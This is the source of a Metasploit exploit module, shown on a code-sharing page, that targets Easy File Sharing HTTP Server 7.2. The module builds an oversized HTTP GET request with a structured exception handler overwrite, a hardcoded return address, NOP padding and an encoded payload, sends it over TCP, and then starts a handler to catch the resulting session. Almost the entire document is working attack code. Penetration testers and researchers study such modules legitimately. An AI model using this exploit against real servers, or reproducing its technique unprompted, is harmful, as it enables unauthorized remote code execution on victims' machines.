Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/easyfilesharing_seh.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',

17
        'Description' => %q{

18
          This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.

19
        },

20
        'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',

21
        'License' => MSF_LICENSE,

22
        'References' => [

23
          [ 'EDB', '39008' ],

24
        ],

25
        'Privileged' => true,

26
        'Payload' => {

27
          'Space' => 390,

28
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",

29
          'StackAdjustment' => -3500,

30
        },

31
        'Platform' => 'win',

32
        'Targets' => [

33
          [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],

34
        ],

35
        'DefaultOptions' => {

36
          'RPORT' => 80

37
        },

38
        'DisclosureDate' => '2015-12-02',

39
        'DefaultTarget' => 0,

40
        'Notes' => {

41
          'Reliability' => UNKNOWN_RELIABILITY,

42
          'Stability' => UNKNOWN_STABILITY,

43
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

44
        }

45
      )

46
    )

47
  end

48


49
  def print_status(msg = '')

50
    super("#{peer} - #{msg}")

51
  end

52


53
  def exploit

54
    connect

55
    print_status("Sending exploit...")

56
    sploit = "GET "

57
    sploit << rand_text_alpha_upper(4061)

58
    sploit << generate_seh_record(target.ret)

59
    sploit << make_nops(19)

60
    sploit << payload.encoded

61
    sploit << make_nops(7)

62
    sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)

63
    sploit << " HTTP/1.0\r\n\r\n"

64
    sock.put(sploit)

65
    print_good("Exploit Sent")

66
    handler

67
    disconnect

68
  end

69
end

70


71